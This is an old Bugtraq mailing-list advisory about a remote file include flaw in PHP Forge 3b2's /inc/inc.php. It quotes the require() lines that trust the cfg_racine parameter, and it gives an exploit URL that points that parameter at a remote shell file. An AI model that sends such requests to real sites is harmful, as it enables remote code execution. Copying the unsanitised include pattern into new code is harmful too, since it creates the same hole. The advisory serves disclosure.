[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
- From: "mahmood ali" <mah_k_2000@xxxxxxxxxxx>
- Date: Sun, 15 Oct 2006 00:05:30 +0000
PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability
############
Source Code:
http://www.comscripts.com/jump.php?action=script&id=697
############
Vulnerable Code:_
require($cfg_racine."inc/vars.php");
require($cfg_racine."inc/config.php");
require($cfg_racine."inc/fonctions.php");
require($cfg_racine."inc/systeme.php");
require($cfg_racine."inc/mysql.php");
require($cfg_racine."inc/membres.php");
############
Exploit :
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?
############
Discoverd By : Mahmood_ali
Conatact : mah_k_2000@xxxxxxxxxxx
############
Special Greetings :_ Tryag-Team
############
bugtraq@xxxxxxxxxxxxxxxxx
submit@xxxxxxxxxxx
_________________________________________________________________
The new Windows Live Toolbar helps you guard against viruses
http://toolbar.live.com/?mkt=en-gb